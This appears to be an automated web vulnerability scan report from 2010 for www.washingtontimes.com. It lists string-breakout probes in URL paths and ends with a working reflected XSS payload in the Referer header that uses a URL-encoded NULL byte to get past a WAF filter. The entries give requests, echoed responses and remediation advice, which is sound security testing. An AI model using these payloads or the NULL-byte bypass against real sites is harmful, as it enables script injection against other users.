HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14576 Date: Mon, 13 Dec 2010 21:28:54 GMT X-Varnish: 570578068 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="staff54c47";3593b73d581"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a11c7'%3b24813ea3b64 was submitted in the REST URL parameter 1. This input was echoed as a11c7';24813ea3b64 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videoa11c7'%3b24813ea3b64/capitol-hill-minute/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14740 Date: Mon, 13 Dec 2010 21:37:14 GMT X-Varnish: 570589396 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29b58"%3bc2756825d4e was submitted in the REST URL parameter 1. This input was echoed as 29b58";c2756825d4e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video29b58"%3bc2756825d4e/capitol-hill-minute/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14549 Date: Mon, 13 Dec 2010 21:36:54 GMT X-Varnish: 570589096 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="video29b58";c2756825d4e"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc41d'%3bb46c09a1569 was submitted in the REST URL parameter 1. This input was echoed as fc41d';b46c09a1569 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videofc41d'%3bb46c09a1569/inside-the-beltway/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14717 Date: Mon, 13 Dec 2010 21:37:12 GMT X-Varnish: 570589581 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d75af"%3bee5822a4ff4 was submitted in the REST URL parameter 1. This input was echoed as d75af";ee5822a4ff4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videod75af"%3bee5822a4ff4/inside-the-beltway/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14734 Date: Mon, 13 Dec 2010 21:37:02 GMT X-Varnish: 570589299 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="videod75af";ee5822a4ff4"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 425a0"%3bc9e2b3827f6 was submitted in the REST URL parameter 1. This input was echoed as 425a0";c9e2b3827f6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video425a0"%3bc9e2b3827f6/two-guys-newsroom/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14576 Date: Mon, 13 Dec 2010 21:37:28 GMT X-Varnish: 570589970 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="video425a0";c9e2b3827f6"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc792'%3b8f81c256a4e was submitted in the REST URL parameter 1. This input was echoed as cc792';8f81c256a4e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videocc792'%3b8f81c256a4e/two-guys-newsroom/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14549 Date: Mon, 13 Dec 2010 21:37:38 GMT X-Varnish: 570590219 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cb01'%3b9b9fa5fcdbf was submitted in the REST URL parameter 1. This input was echoed as 4cb01';9b9fa5fcdbf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video4cb01'%3b9b9fa5fcdbf/waterman-washington/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14740 Date: Mon, 13 Dec 2010 21:36:41 GMT X-Varnish: 570588739 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dccf7"%3bc5954d5673c was submitted in the REST URL parameter 1. This input was echoed as dccf7";c5954d5673c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videodccf7"%3bc5954d5673c/waterman-washington/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14734 Date: Mon, 13 Dec 2010 21:36:32 GMT X-Varnish: 570588502 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="videodccf7";c5954d5673c"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd09f"%3b1b01d6b451 was submitted in the REST URL parameter 1. This input was echoed as dd09f";1b01d6b451 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /videodd09f"%3b1b01d6b451/white-house-minute/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14544 Date: Mon, 13 Dec 2010 21:37:26 GMT X-Varnish: 570589701 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="videodd09f";1b01d6b451"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15eeb'%3b5b29cd335cc was submitted in the REST URL parameter 1. This input was echoed as 15eeb';5b29cd335cc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video15eeb'%3b5b29cd335cc/white-house-minute/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14576 Date: Mon, 13 Dec 2010 21:37:43 GMT X-Varnish: 570590127 Age: 0 Via: 1.1 varnish Connection: close
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %002505b"-alert(1)-"d7e33bc0bde was submitted in the Referer HTTP header. This input was echoed as 2505b"-alert(1)-"d7e33bc0bde in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
function IX_InviteAllowed(){var f=typeof(window.sitePerformedInvite)!='function' || !window.sitePerformedInvite();return f;} function IX_InvitePerformed(){if (typeof(window.siteInvited)=='f ...[SNIP]... iteAllowed()){IX_InvitePerformed();var s = document.createElement('script');s.language='javascript';s.src="http://core.insightexpressai.com/adServer/GetInvite2.aspx?esi=true&bannerID=171516&referer=%002505b"-alert(1)-"d7e33bc0bde";document.getElementsByTagName('head')[0].appendChild(s);}})();